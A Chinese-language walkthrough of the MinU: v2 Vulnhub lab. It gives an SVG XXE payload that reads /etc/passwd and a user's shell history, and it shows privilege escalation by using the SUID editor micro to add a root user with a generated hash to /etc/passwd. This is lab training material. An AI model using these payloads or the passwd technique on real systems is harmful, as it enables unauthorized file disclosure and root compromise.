MinU: v2 Vulnhub Walkthrough


主机层面扫描:

22 和 3306 端口

3306 端口默认是MySQL端口,但是这里尝试爆破报错,最后通http访问发现非MySQL协议,而是一个http的服务

http的协议我们进行目录枚举下

枚举到一个长传的点,我们试试访问下

http://10.10.202.10:3306/upload.html

上传反向shell试试

通过前段绕过svg的格式文件,上传PHP shell 失败,错误页面。

 这里使用svg xxe 注入 漏洞

https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/

payload:

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>

以上内容保存到svgxxe.svg 文件中,尝试上传下

右键源代码查看

这里我们尝试读取下用户的历史命令,尝试看看是够有用户凭证啥的

这里就读取: /home/employee/.ash_history

└──╼ $sudo useradd -h | grep "\-p"
sudo: unable to resolve host HACK404: Name or service not known
  -p, --password PASSWORD       encrypted password of the new account

 所以这里的-p参数后面的字符串,应该是用户employee的密码

SSHD登陆

进行提权操作

minuv2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro
/bin/bbsuid
minuv2:~$
这里经过尝试可以使用micro来编辑passwd文件,可以尝试提权操作。

本地生成密码对应的hash值

$openssl passwd -1 -salt hack404 hack404123
$1$hack404$FyYmBA.v/Hgs60rVCMtiN1

 增加hash值到passwd文件

hack404:$1$hack404$FyYmBA.v/Hgs60rVCMtiN1:0:0:root:root:/bin/ash

增加之后,按ESC键,然后输入y,保存名称为: /etc/passwd

完结!

 


作者:APT-101,发布于:2019/08/14
原文:https://www.cnblogs.com/hack404/p/11350499.html